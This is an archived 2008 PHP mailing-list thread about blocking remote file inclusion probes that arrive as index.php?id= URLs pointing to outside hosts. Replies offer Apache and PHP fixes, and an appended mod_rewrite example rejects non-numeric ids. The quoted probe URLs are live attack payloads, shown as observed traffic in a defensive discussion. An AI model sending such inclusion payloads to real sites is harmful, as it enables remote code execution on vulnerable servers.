From: "Arno Kuhl" on 23 Jul 2008 11:02

I'm getting a lot of bogus requests in the form of "index.php?id=http://64.15.67.17/~babysona/logo.jpg?", sometimes more than a hundred a day per domain. The php script catches it, logs the request, sends an email report and replies with "access denied", but it takes processing which I'd rather not have php busy with. (The php script rejects anything where id=something_not_numeric.) Is there a way for apache to catch these requests before passing it to php? Is it more efficient for apache to handle this than php?

Arno

From: Per Jessen on 23 Jul 2008 12:31

Arno Kuhl wrote:
> Is there a
> way for apache to catch these requests before passing it to php? Is it
> more efficient for apache to handle this than php?

2 x yes. I think you could probably use <LocationMatch> and ban all access with "Deny from all".

/Per Jessen, Zürich

From: Jim Lucas on 23 Jul 2008 17:06

Arno Kuhl wrote:
> I'm getting a lot of bogus requests in the form of
> "index.php?id=http://64.15.67.17/~babysona/logo.jpg?", sometimes more than a
> hundred a day per domain. The php script catches it, logs the request, sends
> an email report and replies with "access denied", but it takes processing
> which I'd rather not have php busy with. (The php script rejects anything
> where id=something_not_numeric.) Is there a way for apache to catch these
> requests before passing it to php? Is it more efficient for apache to handle
> this than php?
>
> Arno
>

Yes, in Apache turn off userdir access.

In your httpd.conf file do this.

UserDir disabled

That way it will not process url that starts with a tilde ~...

That should take care of it. Apache should then only report a 404 error to the error log for the given virtual host.

--
Jim Lucas

"Some men are born to greatness, some achieve greatness, and some have greatness thrust upon them."

Twelfth Night, Act II, Scene V
by William Shakespeare

From: "Arno Kuhl" on 24 Jul 2008 03:04

> I'm getting a lot of bogus requests in the form of
> "index.php?id=http://64.15.67.17/~babysona/logo.jpg?", sometimes more
> than a hundred a day per domain. The php script catches it, logs the
> request, sends an email report and replies with "access denied", but
> it takes processing which I'd rather not have php busy with. (The php
> script rejects anything where id=something_not_numeric.) Is there a
> way for apache to catch these requests before passing it to php? Is it
> more efficient for apache to handle this than php?
>
> Arno
>
> Yes, in Apache turn off userdir access.
>
> In your httpd.conf file do this.
>
> UserDir disabled
>
> That way it will not process url that starts with a tilde ~...
>
> That should take care of it. Apache should then only report a 404 error
> to the error log for the given virtual host.
>
> --

Thanks for the reply. Is that correct though? I always thought in the example http://mysite.com/index.php?id=http://64.15.67.17/~babysona/logo.jpg? the url started with index.php...

Most of the requests though look more like http://mysite.com/index.php?id=http://calebsbirth.pisem.su/caleb.htm? without the tilde.

I was hoping there's a way to tell apache to block requests where id=non_numeric.

Cheers
Arno

From: Chris on 24 Jul 2008 03:14

> I was hoping there's a way to tell apache to block requests where
> id=non_numeric.

It's trying to do a remote inclusion.

It's easy for you to fix in php:

if (isset($_GET['id'])) {
    // Reject any id value that is not numeric
    if (!is_numeric($_GET['id'])) {
        die("Die hacker die!");
    }
}

I'm sure there would be a way to do it with ModRewrite or something but it's 5 lines of code in php so I'd do it there *shrug*.

--
Postgresql & php tutorials
http://www.designmagick.com/
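
One way to do what Arno asks at the Apache level, along the lines of the mod_rewrite idea mentioned in the last reply. This is an added example, not code from any of the posters; it assumes mod_rewrite is loaded, that index.php at the site root is the script taking "id", and that legitimate id values consist of digits only.

```apache
# Added example (assumptions: mod_rewrite loaded, index.php at the site
# root, valid ids are digits only). Goes in the <VirtualHost> block or in
# a .htaccess file in the document root.
#
# The id value is in the query string. Path-based matching (<LocationMatch>,
# UserDir) never sees it; mod_rewrite exposes it as %{QUERY_STRING}.
<IfModule mod_rewrite.c>
    RewriteEngine On

    # True when an "id" parameter (first, or after "&") has a value that
    # contains any character other than a digit before the next "&":
    #   id=42&page=2           -> no match, request goes on to PHP
    #   id=http://host/x.jpg?  -> match
    #   id=42abc               -> match
    RewriteCond %{QUERY_STRING} (^|&)id=[0-9]*[^0-9&]

    # Answer 403 Forbidden before the PHP handler is invoked.
    # "^/?index\.php$" fits both vhost context (leading slash) and
    # .htaccess context (no leading slash).
    RewriteRule ^/?index\.php$ - [F]
</IfModule>
```

%{QUERY_STRING} is matched as sent, without URL-decoding, and an empty id= passes this rule, so the is_numeric() check in PHP stays in place as the authoritative validation.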